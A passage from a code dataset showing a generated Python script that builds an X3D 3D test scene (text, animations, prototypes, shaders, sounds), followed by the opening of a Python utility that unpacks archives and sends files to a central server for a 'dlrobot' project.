Java\",\"SAI Library\",\"X3DJSAIL\"])\n# Comment example A, plain quotation marks: He said, \\\"Immel did it!\\\" \r\n# Comment example B, XML character entities: He said, "Immel did it!" \r\nMetadataSet62 = x3d.MetadataSet()\nMetadataSet62.setName(\"EscapedQuotationMarksMetadataSet\")\nMetadataString63 = x3d.MetadataString()\nMetadataString63.setName(\"quotesTestC\")\nMetadataString63.setValue([\"MFString example C, backslash-escaped quotes: He said, \\\"Immel did it!\\\"\"])\n\nMetadataSet62.setValue(MetadataString63)\nMetadataString64 = x3d.MetadataString()\nMetadataString64.setName(\"extraChildTest\")\nMetadataString64.setValue([\"checks MetadataSetObject addValue() method\"])\n\nMetadataSet62.setValue(MetadataString64)\n\nText61.setMetadata(MetadataSet62)\nFontStyle65 = x3d.FontStyle()\nFontStyle65.setFamily([\"SERIF\"])\nFontStyle65.setJustify([\"MIDDLE\",\"MIDDLE\"])\n\nText61.setFontStyle(FontStyle65)\n\nShape58.setGeometry(Text61)\n\nTransform57.addChildren(Shape58)\nCollision66 = x3d.Collision()\n# test containerField='proxy' \r\nShape67 = x3d.Shape()\nShape67.setDEF(\"ProxyShape\")\n# alternative XML encoding: Text string='\\\"One, Two, Comment\\\" \\\"\\\" \\\"He said, \\\\"Immel did it!\\\\"\\\"' \r\n# alternative XML encoding: Text string='\\\"One, Two, Comment\\\" \\\"\\\" \\\"He said, \\\\"Immel did it!\\\\"\\\" \\\"\\\"' \r\n# alternative Java source: .setString(new String [] {\\\"One, Two, Comment\\\", \\\"\\\", \\\"He said, \\\\\\\"Immel did it!\\\\\\\"\\\"}) \r\n# reference: http://www.web3d.org/x3d/content/examples/Basic/X3dSpecifications/StringArrayEncodingExamplesIndex.html \r\nText68 = x3d.Text()\nText68.setString([\"One, Two, Text\",\"\",\"He said, \\\"Immel did it!\\\" \\\"\\\"\"])\n\nShape67.setGeometry(Text68)\n\nCollision66.setProxy(Shape67)\n\nTransform57.addChildren(Collision66)\n# It's a beautiful world \r\n# ... for you! 
\r\n# https://en.wikipedia.org/wiki/Beautiful_World_(Devo_song) \r\n\nScene31.addChildren(Transform57)\n# repeatedly spin 180 degrees as a readable special effect \r\nOrientationInterpolator69 = x3d.OrientationInterpolator()\nOrientationInterpolator69.setDEF(\"SpinInterpolator\")\nOrientationInterpolator69.setKey([0,0.5,1])\nOrientationInterpolator69.setKeyValue([0,1,0,4.712389,0,1,0,0,0,1,0,1.5707964])\n\nScene31.addChildren(OrientationInterpolator69)\nTimeSensor70 = x3d.TimeSensor()\nTimeSensor70.setDEF(\"SpinClock\")\nTimeSensor70.setCycleInterval(5.0)\nTimeSensor70.setLoop(True)\n\nScene31.addChildren(TimeSensor70)\nROUTE71 = x3d.ROUTE()\nROUTE71.setFromField(\"fraction_changed\")\nROUTE71.setFromNode(\"SpinClock\")\nROUTE71.setToField(\"set_fraction\")\nROUTE71.setToNode(\"SpinInterpolator\")\n\nScene31.addChildren(ROUTE71)\nROUTE72 = x3d.ROUTE()\nROUTE72.setFromField(\"value_changed\")\nROUTE72.setFromNode(\"SpinInterpolator\")\nROUTE72.setToField(\"rotation\")\nROUTE72.setToNode(\"TextTransform\")\n\nScene31.addChildren(ROUTE72)\nGroup73 = x3d.Group()\nGroup73.setDEF(\"BackgroundGroup\")\nBackground74 = x3d.Background()\nBackground74.setDEF(\"GradualBackground\")\n\nGroup73.addChildren(Background74)\nScript75 = x3d.Script()\nScript75.setDEF(\"colorTypeConversionScript\")\nfield76 = x3d.field()\nfield76.setName(\"colorInput\")\nfield76.setAccessType(\"inputOnly\")\nfield76.setType(\"SFColor\")\n\nScript75.addField(field76)\nfield77 = x3d.field()\nfield77.setName(\"colorsOutput\")\nfield77.setAccessType(\"outputOnly\")\nfield77.setType(\"MFColor\")\n\nScript75.addField(field77)\n\nScript75.setSourceCode('''\\n\"+\n\"ecmascript:\\n\"+\n\"\\n\"+\n\"function colorInput (eventValue) // Example source code\\n\"+\n\"{\\n\"+\n\" colorsOutput = new MFColor(eventValue); // assigning value sends output event\\n\"+\n\"// Browser.print('colorInput=' + eventValue + ', colorsOutput=' + colorsOutput + '\\\\n');\\n\"+\n\"}\\n\"+\n\"''')\n\nGroup73.addChildren(Script75)\nColorInterpolator78 = x3d.ColorInterpolator()\nColorInterpolator78.setDEF(\"ColorAnimator\")\nColorInterpolator78.setKey([0,0.5,1])\nColorInterpolator78.setKeyValue([0.9411765,1,1,0.29411766,0,0.50980395,0.9411765,1,1])\n# AZURE to INDIGO and back again \r\n\nGroup73.addChildren(ColorInterpolator78)\nTimeSensor79 = x3d.TimeSensor()\nTimeSensor79.setDEF(\"ColorClock\")\nTimeSensor79.setCycleInterval(60.0)\nTimeSensor79.setLoop(True)\n\nGroup73.addChildren(TimeSensor79)\nROUTE80 = x3d.ROUTE()\nROUTE80.setFromField(\"colorsOutput\")\nROUTE80.setFromNode(\"colorTypeConversionScript\")\nROUTE80.setToField(\"skyColor\")\nROUTE80.setToNode(\"GradualBackground\")\n\nGroup73.addChildren(ROUTE80)\nROUTE81 = x3d.ROUTE()\nROUTE81.setFromField(\"value_changed\")\nROUTE81.setFromNode(\"ColorAnimator\")\nROUTE81.setToField(\"colorInput\")\nROUTE81.setToNode(\"colorTypeConversionScript\")\n\nGroup73.addChildren(ROUTE81)\nROUTE82 = x3d.ROUTE()\nROUTE82.setFromField(\"fraction_changed\")\nROUTE82.setFromNode(\"ColorClock\")\nROUTE82.setToField(\"set_fraction\")\nROUTE82.setToNode(\"ColorAnimator\")\n\nGroup73.addChildren(ROUTE82)\n\nScene31.addChildren(Group73)\nProtoDeclare83 = x3d.ProtoDeclare()\nProtoDeclare83.setName(\"ArtDeco01Material\")\nProtoDeclare83.setAppinfo(\"tooltip: ArtDeco01Material prototype is a Material node\")\nProtoInterface84 = x3d.ProtoInterface()\nfield85 = x3d.field()\nfield85.setName(\"description\")\nfield85.setAccessType(\"inputOutput\")\nfield85.setAppinfo(\"tooltip for 
descriptionField\")\nfield85.setType(\"SFString\")\nfield85.setValue(\"ArtDeco01Material prototype is a Material node\")\n\nProtoInterface84.addField(field85)\nfield86 = x3d.field()\nfield86.setName(\"enabled\")\nfield86.setAccessType(\"inputOutput\")\nfield86.setType(\"SFBool\")\nfield86.setValue(\"true\")\n\nProtoInterface84.addField(field86)\n\nProtoDeclare83.setProtoInterface(ProtoInterface84)\nProtoBody87 = x3d.ProtoBody()\n# Initial node of ProtoBody determines prototype node type \r\nMaterial88 = x3d.Material()\nMaterial88.setAmbientIntensity(0.25)\nMaterial88.setDiffuseColor([0.282435,0.085159,0.134462])\nMaterial88.setShininess(0.127273)\nMaterial88.setSpecularColor([0.276305,0.11431,0.139857])\n\nProtoBody87.addChildren(Material88)\n# [HelloWorldProgram diagnostic] should be connected to scene graph: artDeco01ProtoDeclare.getNodeType()=\\\"Material\\\" \r\n# presence of follow-on TouchSensor shows that additional nodes are allowed in ProtoBody after initial node, regardless of node types \r\nTouchSensor89 = x3d.TouchSensor()\nTouchSensor89.setDescription(\"within ProtoBody\")\nIS90 = x3d.IS()\nconnect91 = x3d.connect()\nconnect91.setNodeField(\"description\")\nconnect91.setProtoField(\"description\")\n\nIS90.addConnect(connect91)\nconnect92 = x3d.connect()\nconnect92.setNodeField(\"enabled\")\nconnect92.setProtoField(\"enabled\")\n\nIS90.addConnect(connect92)\n\nTouchSensor89.setIS(IS90)\n\nProtoBody87.addChildren(TouchSensor89)\n\nProtoDeclare83.setProtoBody(ProtoBody87)\n\nScene31.addChildren(ProtoDeclare83)\nExternProtoDeclare93 = x3d.ExternProtoDeclare()\nExternProtoDeclare93.setName(\"ArtDeco02Material\")\nExternProtoDeclare93.setAppinfo(\"this is a different Material node\")\nExternProtoDeclare93.setUrl([\"http://X3dGraphics.com/examples/X3dForWebAuthors/Chapter14Prototypes/ArtDecoPrototypesExcerpt.x3d#ArtDeco02Material\",\"http://X3dGraphics.com/examples/X3dForWebAuthors/Chapter14Prototypes/ArtDecoPrototypesExcerpt.x3dv#ArtDeco02Material\"])\n# [HelloWorldProgram diagnostic] artDeco02ExternProtoDeclare.getNodeType()=\\\"ERROR_UNKNOWN_EXTERNPROTODECLARE_NODE_TYPE: ExternProtoDeclare name='ArtDeco02Material' type cannot be remotely accessed at run time. TODO X3DJSAIL needs to add further capability that retrieves the ExternProtoDeclare file.\\\" \r\nfield94 = x3d.field()\nfield94.setName(\"description\")\nfield94.setAccessType(\"inputOutput\")\nfield94.setAppinfo(\"tooltip for descriptionField\")\nfield94.setType(\"SFString\")\n\nExternProtoDeclare93.addField(field94)\n\nScene31.addChildren(ExternProtoDeclare93)\n# Tested ArtDeco01ProtoInstance, ArtDeco02ProtoInstance for improper node type when ProtoInstance is added in wrong place \r\nShape95 = x3d.Shape()\nShape95.setDEF(\"TestShape1\")\nAppearance96 = x3d.Appearance()\nAppearance96.setDEF(\"TestAppearance1\")\n# ArtDeco01Material prototype goes here... 
TODO ensure setContainerField is handled in exported Java \r\nProtoInstance97 = x3d.ProtoInstance()\nProtoInstance97.setName(\"ArtDeco01Material\")\n# [HelloWorldProgram diagnostic] ArtDeco01ProtoInstance.getNodeType()=\\\"Material\\\" \r\nfieldValue98 = x3d.fieldValue()\nfieldValue98.setName(\"description\")\nfieldValue98.setValue(\"ArtDeco01Material can substitute for a Material node\")\n\nProtoInstance97.addFieldValue(fieldValue98)\n\nAppearance96.setMaterial(ProtoInstance97)\n\nShape95.setAppearance(Appearance96)\nSphere99 = x3d.Sphere()\nSphere99.setRadius(0.001)\n\nShape95.setGeometry(Sphere99)\n\nScene31.addChildren(Shape95)\nShape100 = x3d.Shape()\nShape100.setDEF(\"TestShape2\")\nAppearance101 = x3d.Appearance()\nAppearance101.setDEF(\"TestAppearance2\")\n# ArtDeco02Material prototype goes here... TODO ensure setContainerField is handled in exported Java \r\nProtoInstance102 = x3d.ProtoInstance()\nProtoInstance102.setDEF(\"ArtDeco02MaterialDEF\")\nProtoInstance102.setName(\"ArtDeco02Material\")\n# [HelloWorldProgram diagnostic] ArtDeco02ProtoInstance.getNodeType()=\\\"ERROR_UNKNOWN_EXTERNPROTODECLARE_NODE_TYPE: ExternProtoDeclare name='ArtDeco02Material' type cannot be remotely accessed at run time. TODO X3DJSAIL needs to add further capability that retrieves the ExternProtoDeclare file.\\\" \r\nfieldValue103 = x3d.fieldValue()\nfieldValue103.setName(\"description\")\nfieldValue103.setValue(\"ArtDeco02Material can substitute for another Material node\")\n\nProtoInstance102.addFieldValue(fieldValue103)\n\nAppearance101.setMaterial(ProtoInstance102)\n\nShape100.setAppearance(Appearance101)\nCone104 = x3d.Cone()\nCone104.setBottomRadius(0.001)\nCone104.setHeight(0.001)\n\nShape100.setGeometry(Cone104)\n\nScene31.addChildren(Shape100)\nShape105 = x3d.Shape()\nShape105.setDEF(\"TestShape3\")\nAppearance106 = x3d.Appearance()\nAppearance106.setDEF(\"TestAppearance3\")\n# ArtDeco02Material ProtoInstance USE goes here. Note that name field is NOT defined as part of ProtoInstance USE. 
\r\nProtoInstance107 = x3d.ProtoInstance()\nProtoInstance107.setUSE(\"ArtDeco02MaterialDEF\")\n\nAppearance106.setMaterial(ProtoInstance107)\n\nShape105.setAppearance(Appearance106)\nCylinder108 = x3d.Cylinder()\nCylinder108.setHeight(0.001)\nCylinder108.setRadius(0.001)\n\nShape105.setGeometry(Cylinder108)\n\nScene31.addChildren(Shape105)\nInline109 = x3d.Inline()\nInline109.setDEF(\"inlineSceneDef\")\nInline109.setUrl([\"someOtherScene.x3d\",\"http://www.web3d.org/specifications/java/examples/someOtherScene.x3d\"])\n\nScene31.addChildren(Inline109)\nIMPORT110 = x3d.IMPORT()\nIMPORT110.setAS(\"WorldInfoDEF2\")\nIMPORT110.setImportedDEF(\"WorldInfoDEF\")\nIMPORT110.setInlineDEF(\"inlineSceneDef\")\n\nScene31.addChildren(IMPORT110)\nEXPORT111 = x3d.EXPORT()\nEXPORT111.setAS(\"WorldInfoDEF3\")\nEXPORT111.setLocalDEF(\"WorldInfoDEF\")\n\nScene31.addChildren(EXPORT111)\nProtoDeclare112 = x3d.ProtoDeclare()\nProtoDeclare112.setName(\"MaterialModulator\")\nProtoDeclare112.setAppinfo(\"mimic a Material node and modulate fields as an animation effect\")\nProtoDeclare112.setDocumentation(\"http://x3dgraphics.com/examples/X3dForWebAuthors/Chapter14Prototypes/MaterialModulatorIndex.html\")\nProtoInterface113 = x3d.ProtoInterface()\nfield114 = x3d.field()\nfield114.setName(\"enabled\")\nfield114.setAccessType(\"inputOutput\")\nfield114.setType(\"SFBool\")\nfield114.setValue(\"true\")\n\nProtoInterface113.addField(field114)\nfield115 = x3d.field()\nfield115.setName(\"diffuseColor\")\nfield115.setAccessType(\"inputOutput\")\nfield115.setType(\"SFColor\")\nfield115.setValue(\"0 0 0\")\n\nProtoInterface113.addField(field115)\nfield116 = x3d.field()\nfield116.setName(\"emissiveColor\")\nfield116.setAccessType(\"inputOutput\")\nfield116.setType(\"SFColor\")\nfield116.setValue(\"0.05 0.05 0.5\")\n\nProtoInterface113.addField(field116)\nfield117 = x3d.field()\nfield117.setName(\"specularColor\")\nfield117.setAccessType(\"inputOutput\")\nfield117.setType(\"SFColor\")\nfield117.setValue(\"0 0 0\")\n\nProtoInterface113.addField(field117)\nfield118 = x3d.field()\nfield118.setName(\"transparency\")\nfield118.setAccessType(\"inputOutput\")\nfield118.setType(\"SFFloat\")\nfield118.setValue(\"0.0\")\n\nProtoInterface113.addField(field118)\nfield119 = x3d.field()\nfield119.setName(\"shininess\")\nfield119.setAccessType(\"inputOutput\")\nfield119.setType(\"SFFloat\")\nfield119.setValue(\"0.0\")\n\nProtoInterface113.addField(field119)\nfield120 = x3d.field()\nfield120.setName(\"ambientIntensity\")\nfield120.setAccessType(\"inputOutput\")\nfield120.setType(\"SFFloat\")\nfield120.setValue(\"0.0\")\n\nProtoInterface113.addField(field120)\n\nProtoDeclare112.setProtoInterface(ProtoInterface113)\nProtoBody121 = x3d.ProtoBody()\nMaterial122 = x3d.Material()\nMaterial122.setDEF(\"MaterialNode\")\nIS123 = x3d.IS()\nconnect124 = x3d.connect()\nconnect124.setNodeField(\"diffuseColor\")\nconnect124.setProtoField(\"diffuseColor\")\n\nIS123.addConnect(connect124)\nconnect125 = x3d.connect()\nconnect125.setNodeField(\"emissiveColor\")\nconnect125.setProtoField(\"emissiveColor\")\n\nIS123.addConnect(connect125)\nconnect126 = x3d.connect()\nconnect126.setNodeField(\"specularColor\")\nconnect126.setProtoField(\"specularColor\")\n\nIS123.addConnect(connect126)\nconnect127 = x3d.connect()\nconnect127.setNodeField(\"transparency\")\nconnect127.setProtoField(\"transparency\")\n\nIS123.addConnect(connect127)\nconnect128 = 
x3d.connect()\nconnect128.setNodeField(\"shininess\")\nconnect128.setProtoField(\"shininess\")\n\nIS123.addConnect(connect128)\nconnect129 = x3d.connect()\nconnect129.setNodeField(\"ambientIntensity\")\nconnect129.setProtoField(\"ambientIntensity\")\n\nIS123.addConnect(connect129)\n\nMaterial122.setIS(IS123)\n\nProtoBody121.addChildren(Material122)\n# Only first node (the node type) is renderable, others are along for the ride \r\nScript130 = x3d.Script()\nScript130.setDEF(\"MaterialModulatorScript\")\nfield131 = x3d.field()\nfield131.setName(\"enabled\")\nfield131.setAccessType(\"inputOutput\")\nfield131.setType(\"SFBool\")\n\nScript130.addField(field131)\nfield132 = x3d.field()\nfield132.setName(\"diffuseColor\")\nfield132.setAccessType(\"inputOutput\")\nfield132.setType(\"SFColor\")\n\nScript130.addField(field132)\nfield133 = x3d.field()\nfield133.setName(\"newColor\")\nfield133.setAccessType(\"outputOnly\")\nfield133.setType(\"SFColor\")\n\nScript130.addField(field133)\nfield134 = x3d.field()\nfield134.setName(\"clockTrigger\")\nfield134.setAccessType(\"inputOnly\")\nfield134.setType(\"SFTime\")\n\nScript130.addField(field134)\nIS135 = x3d.IS()\nconnect136 = x3d.connect()\nconnect136.setNodeField(\"enabled\")\nconnect136.setProtoField(\"enabled\")\n\nIS135.addConnect(connect136)\nconnect137 = x3d.connect()\nconnect137.setNodeField(\"diffuseColor\")\nconnect137.setProtoField(\"diffuseColor\")\n\nIS135.addConnect(connect137)\n\nScript130.setIS(IS135)\n\nScript130.setSourceCode('''\\n\"+\n\"ecmascript:\\n\"+\n\"function initialize ()\\n\"+\n\"{\\n\"+\n\" newColor = diffuseColor; // start with correct color\\n\"+\n\"}\\n\"+\n\"function set_enabled (newValue)\\n\"+\n\"{\\n\"+\n\"\tenabled = newValue;\\n\"+\n\"}\\n\"+\n\"function clockTrigger (timeValue)\\n\"+\n\"{\\n\"+\n\" if (!enabled) return;\\n\"+\n\" red = newColor.r;\\n\"+\n\" green = newColor.g;\\n\"+\n\" blue = newColor.b;\\n\"+\n\" \\n\"+\n\" // note different modulation rates for each color component, % is modulus operator\\n\"+\n\" newColor = new SFColor ((red + 0.02) % 1, (green + 0.03) % 1, (blue + 0.04) % 1);\\n\"+\n\"\tif (enabled)\\n\"+\n\"\t{\\n\"+\n\"\t\tBrowser.print ('diffuseColor=(' + red + ',' + green + ',' + blue + ') newColor=' + newColor.toString() + '\\\\n');\\n\"+\n\"\t}\\n\"+\n\"}\\n\"+\n\"''')\n\nProtoBody121.addChildren(Script130)\n\nProtoDeclare112.setProtoBody(ProtoBody121)\n\nScene31.addChildren(ProtoDeclare112)\n# Test success: declarative statement createDeclarativeShapeTests() \r\nGroup138 = x3d.Group()\nGroup138.setDEF(\"DeclarativeGroupExample\")\nShape139 = x3d.Shape()\nMetadataString140 = x3d.MetadataString()\nMetadataString140.setDEF(\"FindableMetadataStringTest\")\nMetadataString140.setName(\"findThisNameValue\")\nMetadataString140.setValue([\"test case\"])\n\nShape139.setMetadata(MetadataString140)\nAppearance141 = x3d.Appearance()\nAppearance141.setDEF(\"DeclarativeAppearanceExample\")\n# DeclarativeMaterialExample gets overridden by subsequently added MaterialModulator ProtoInstance \r\nProtoInstance142 = x3d.ProtoInstance()\nProtoInstance142.setDEF(\"MyMaterialModulator\")\nProtoInstance142.setName(\"MaterialModulator\")\n\nAppearance141.setMaterial(ProtoInstance142)\n\nShape139.setAppearance(Appearance141)\nCone143 = x3d.Cone()\nCone143.setBottom(False)\nCone143.setBottomRadius(0.05)\nCone143.setHeight(0.1)\n\nShape139.setGeometry(Cone143)\n\nGroup138.addChildren(Shape139)\n# Test success: declarativeGroup.addChild() singleton pipeline method \r\n\nScene31.addChildren(Group138)\n# Test success: 
declarative statement addChild() \r\n# Test success: x3dModel.findNodeByDEF(DeclarativeAppearanceExample) = i.e. \r\n# Test success: x3dModel.findElementByNameValue(findThisNameValue) = \r\n# Test success: x3dModel.findElementByNameValue(\\\"ArtDeco01Material\\\", \\\"ProtoDeclare\\\") found \r\n# Test success: x3dModel.findElementByNameValue(\\\"MaterialModulator\\\", \\\"ProtoDeclare\\\") found \r\n# Test success: x3dModel.findElementByNameValue(\\\"MaterialModulator\\\", \\\"ProtoInstance\\\") found \r\nGroup144 = x3d.Group()\nGroup144.setDEF(\"TestFieldObjectsGroup\")\n# testFieldObjects() results \r\n# SFBool default=true, true=true, false=false, negate()=true \r\n# MFBool default=, initial=true false true, negate()=false true false \r\n# SFFloat default=0.0, initial=1.0, setValue(2)=2.0, setValue(3.0f)=3.0, setValue(4.0)=4.0 \r\n# MFFloat default=, initial=1 2 3, append(5)=1 2 3 5, inserts(3,4)(0,0)=0 1 2 3 4 5, append(6)=0 1 2 3 4 5 6, size()=7 \r\n# ... get1Value[3]=3.0, remove[1]=0 2 3 4 5 6, set1Value(0,10)=10 2 3 4 5 6, multiply(2)=20 4 6 8 10 12, clear= \r\n# SFVec3f default=0 0 0, initial=1 2 3, setValue=4 5 6, multiply(2)=8 10 12, normalize()=0.45584232 0.5698029 0.68376344, regex matches()=true \r\n# regex test SFVec3f().matches(\\\"1 2 3\\\")=true, regex test SFVec3f().matches(\\\"1 2 3 4\\\")=false, regex test (SFRotationObject.matches(\\\"0 0 0 0\\\")=true, failure detecting illegal (zero axis) rotation value \r\n\nScene31.addChildren(Group144)\nSound145 = x3d.Sound()\nSound145.setLocation([0,1.6,0])\n# set sound-ellipsoid location height at 1.6m to match typical avatar height \r\nAudioClip146 = x3d.AudioClip()\nAudioClip146.setDescription(\"chimes\")\nAudioClip146.setUrl([\"chimes.wav\",\"http://www.web3d.org/x3d/content/examples/ConformanceNist/Sounds/AudioClip/chimes.wav\"])\n# Scene example fragment from http://www.web3d.org/x3d/content/examples/ConformanceNist/Sounds/AudioClip/default.x3d \r\n\nSound145.setSource(AudioClip146)\n\nScene31.addChildren(Sound145)\nSound147 = x3d.Sound()\nSound147.setLocation([0,1.6,0])\n# set sound-ellipsoid location height at 1.6m to match typical avatar height \r\nMovieTexture148 = x3d.MovieTexture()\nMovieTexture148.setDescription(\"mpgsys.mpg from ConformanceNist suite\")\nMovieTexture148.setUrl([\"mpgsys.mpg\",\"http://www.web3d.org/x3d/content/examples/ConformanceNist/Appearance/MovieTexture/mpgsys.mpg\"])\n# Scene example fragment from http://www.web3d.org/x3d/content/examples/ConformanceNist/Appearance/MovieTexture/mpeg1-systems.x3d \r\n# Expected containerField='source', allowed containerField values=\\\"texture\\\" \\\"source\\\" \\\"back\\\" \\\"bottom\\\" \\\"front\\\" \\\"left\\\" \\\"right\\\" \\\"top\\\" \\\"backTexture\\\" \\\"bottomTexture\\\" \\\"frontTexture\\\" \\\"leftTexture\\\" \\\"rightTexture\\\" \\\"topTexture\\\" \\\"watchList\\\" \r\n\nSound147.setSource(MovieTexture148)\n\nScene31.addChildren(Sound147)\n# Test success: AnchorObject.isNode()=true, siteAnchor.isNode()=true \r\n# Test success: AnchorObject.isStatement()=false, siteAnchor.isStatement()=false \r\n# Test success: ROUTEObject.isNode()=false, orbitPositionROUTE.isNode()=false \r\n# Test success: ROUTEObject.isStatement()=true, orbitPositionROUTE.isStatement()=true \r\n# Test success: CommentsBlock.isNode()=false, testComments.isNode()=false \r\n# Test failure: CommentsBlock.isStatement()=true, testComments.isStatement()=true \r\nShape149 = x3d.Shape()\nShape149.setDEF(\"ExtrusionShape\")\n# ExampleExtrusion isCrossSectionClosed()=true, 
crossSection='[1.0, 1.0, 1.0, -1.0, -1.0, -1.0, -1.0, 1.0, 1.0, 1.0]' \r\n# ExampleExtrusion isSpineClosed()=false, spine='[0.0, 0.0, 0.0, 0.0, 1.0, 0.0]' \r\nAppearance150 = x3d.Appearance()\nAppearance150.setDEF(\"TransparentAppearance\")\nMaterial151 = x3d.Material()\nMaterial151.setTransparency(1.0)\n\nAppearance150.setMaterial(Material151)\n\nShape149.setAppearance(Appearance150)\nExtrusion152 = x3d.Extrusion()\nExtrusion152.setDEF(\"ExampleExtrusion\")\n\nShape149.setGeometry(Extrusion152)\n\nScene31.addChildren(Shape149)\nGroup153 = x3d.Group()\n# Test MFNode children array as an ordered list consisting of comments, statements, ProtoInstance and nodes \r\nProtoDeclare154 = x3d.ProtoDeclare()\nProtoDeclare154.setName(\"NewWorldInfo\")\nProtoInterface155 = x3d.ProtoInterface()\nfield156 = x3d.field()\nfield156.setName(\"description\")\nfield156.setAccessType(\"initializeOnly\")\nfield156.setType(\"SFString\")\n\nProtoInterface155.addField(field156)\n\nProtoDeclare154.setProtoInterface(ProtoInterface155)\nProtoBody157 = x3d.ProtoBody()\nWorldInfo158 = x3d.WorldInfo()\n\nProtoBody157.addChildren(WorldInfo158)\n\nProtoDeclare154.setProtoBody(ProtoBody157)\n\nGroup153.addChildren(ProtoDeclare154)\nProtoInstance159 = x3d.ProtoInstance()\nProtoInstance159.setDEF(\"Proto1\")\nProtoInstance159.setName(\"NewWorldInfo\")\nfieldValue160 = x3d.fieldValue()\nfieldValue160.setName(\"description\")\nfieldValue160.setValue(\"testing 1 2 3\")\n\nProtoInstance159.addFieldValue(fieldValue160)\n\nGroup153.addChildren(ProtoInstance159)\nGroup161 = x3d.Group()\nGroup161.setDEF(\"Node2\")\n# intentionally empty \r\n\nGroup153.addChildren(Group161)\nProtoInstance162 = x3d.ProtoInstance()\nProtoInstance162.setDEF(\"Proto3\")\nProtoInstance162.setName(\"NewWorldInfo\")\n\nGroup153.addChildren(ProtoInstance162)\nTransform163 = x3d.Transform()\nTransform163.setDEF(\"Node4\")\n# intentionally empty \r\n\nGroup153.addChildren(Transform163)\n# Test satisfactorily creates MFNode children array as an ordered list with mixed content \r\n\nScene31.addChildren(Group153)\nProtoDeclare164 = x3d.ProtoDeclare()\nProtoDeclare164.setName(\"ShaderProto\")\nProtoBody165 = x3d.ProtoBody()\nProgramShader166 = x3d.ProgramShader()\n\nProtoBody165.addChild(ProgramShader166)\n\nProtoDeclare164.setProtoBody(ProtoBody165)\n\nScene31.addChildren(ProtoDeclare164)\nShape167 = x3d.Shape()\nAppearance168 = x3d.Appearance()\n# Test MFNode shaders array as an ordered list consisting of comments, ProtoInstance and nodes \r\n# Test satisfactorily creates MFNode shaders array as an ordered list with mixed content \r\nProgramShader169 = x3d.ProgramShader()\nProgramShader169.setDEF(\"TestShader1\")\nShaderProgram170 = x3d.ShaderProgram()\nShaderProgram170.setDEF(\"TestShader2\")\n\nProgramShader169.addPrograms(ShaderProgram170)\n\nAppearance168.addShaders(ProgramShader169)\nProtoInstance171 = x3d.ProtoInstance()\nProtoInstance171.setDEF(\"TestShader3\")\nProtoInstance171.setName(\"ShaderProto\")\n\nAppearance168.addChild(ProtoInstance171)\nComposedShader172 = x3d.ComposedShader()\nComposedShader172.setDEF(\"TestShader4\")\nShaderPart173 = x3d.ShaderPart()\nShaderPart173.setDEF(\"TestShader5\")\n\nComposedShader172.addParts(ShaderPart173)\n\nAppearance168.addShaders(ComposedShader172)\n\nShape167.setAppearance(Appearance168)\n\nScene31.addChildren(Shape167)\nTransform174 = x3d.Transform()\nTransform174.setDEF(\"SpecialtyNodes\")\nCADLayer175 = x3d.CADLayer()\nCADAssembly176 = x3d.CADAssembly()\nCADPart177 = x3d.CADPart()\nCADFace178 = 
x3d.CADFace()\n\nCADPart177.addChildren(CADFace178)\n\nCADAssembly176.addChildren(CADPart177)\n\nCADLayer175.addChildren(CADAssembly176)\n\nTransform174.addChildren(CADLayer175)\nEspduTransform179 = x3d.EspduTransform()\nEspduTransform179.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(EspduTransform179)\nReceiverPdu180 = x3d.ReceiverPdu()\nReceiverPdu180.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(ReceiverPdu180)\nSignalPdu181 = x3d.SignalPdu()\nSignalPdu181.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(SignalPdu181)\nTransmitterPdu182 = x3d.TransmitterPdu()\nTransmitterPdu182.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(TransmitterPdu182)\nDISEntityManager183 = x3d.DISEntityManager()\nDISEntityTypeMapping184 = x3d.DISEntityTypeMapping()\n\nDISEntityManager183.addMapping(DISEntityTypeMapping184)\n\nTransform174.addChildren(DISEntityManager183)\nHAnimHumanoid185 = x3d.HAnimHumanoid()\nHAnimHumanoid185.setDEF(\"TestHumanoidDEF\")\nHAnimHumanoid185.setName(\"TestHumanoid\")\nHAnimHumanoid185.setVersion(\"2.0\")\n\nTransform174.addChildren(HAnimHumanoid185)\n\nScene31.addChildren(Transform174)\n\nX3D0.setScene(Scene31)\nX3D0.toFileX3D(\"HelloWorldProgramOutput_ReloadedDOM_RoundTrip.x3d\")\n","sub_path":"HelloWorldProgramOutput_ReloadedDOM.py","file_name":"HelloWorldProgramOutput_ReloadedDOM.py","file_ext":"py","file_size_in_byte":33324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"96884045","text":"from dlrobot.common.central_protocol import DLROBOT_HEADER_KEYS\nfrom common.archives import TDearchiver\nfrom dlrobot.common.robot_project import TRobotProject\nfrom common.logging_wrapper import setup_logging\n\nimport argparse\nimport os\nimport sys\nimport time\nimport http.server\nimport shutil\nimport tarfile\nimport platform\nfrom bs4 import BeautifulSoup\n\n#see add_fns_json_to_html.sh to know how to use it\n\nclass TUnzipper:\n def __init__(self, args):\n self.args = args\n self.working = True\n self.logger = setup_logging(log_file_name=self.args.log_file_name)\n self.setup_environment()\n\n @staticmethod\n def parse_args(arg_list):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--archive\", dest='archive_path', required=True)\n parser.add_argument(\"--server-address\", dest='server_address', default=None,\n help=\"by default read it from environment variable DLROBOT_CENTRAL_SERVER_ADDRESS\")\n parser.add_argument(\"--log-file-name\", dest='log_file_name', required=False, default=\"unzip_archive.log\")\n parser.add_argument(\"--http-put-timeout\", dest='http_put_timeout', required=False, type=int, default=60 * 10)\n parser.add_argument(\"--web-domain\", dest='web_domain', required=True)\n parser.add_argument(\"--wait-after-each-doc\", dest='wait_after_each_doc', type=int, default=1)\n args = parser.parse_args(arg_list)\n return args\n\n def get_url_from_meta_tag(self, html_path, default=None):\n with open(html_path, \"rb\") as inp:\n soup = BeautifulSoup(inp.read(), \"html.parser\")\n for meta_tag in soup.find_all(\"meta\"):\n if meta_tag.attrs.get('name') == 'smartparser_url':\n return meta_tag.attrs.get('content')\n return default\n\n def send_files_to_central(self, files):\n web_domains = list()\n for file_name in files:\n web_domain = self.args.web_domain\n if file_name.endswith('.html'):\n web_domain = self.get_url_from_meta_tag(file_name, self.args.web_domain)\n web_domains.append(web_domain)\n\n robot_project_path = 
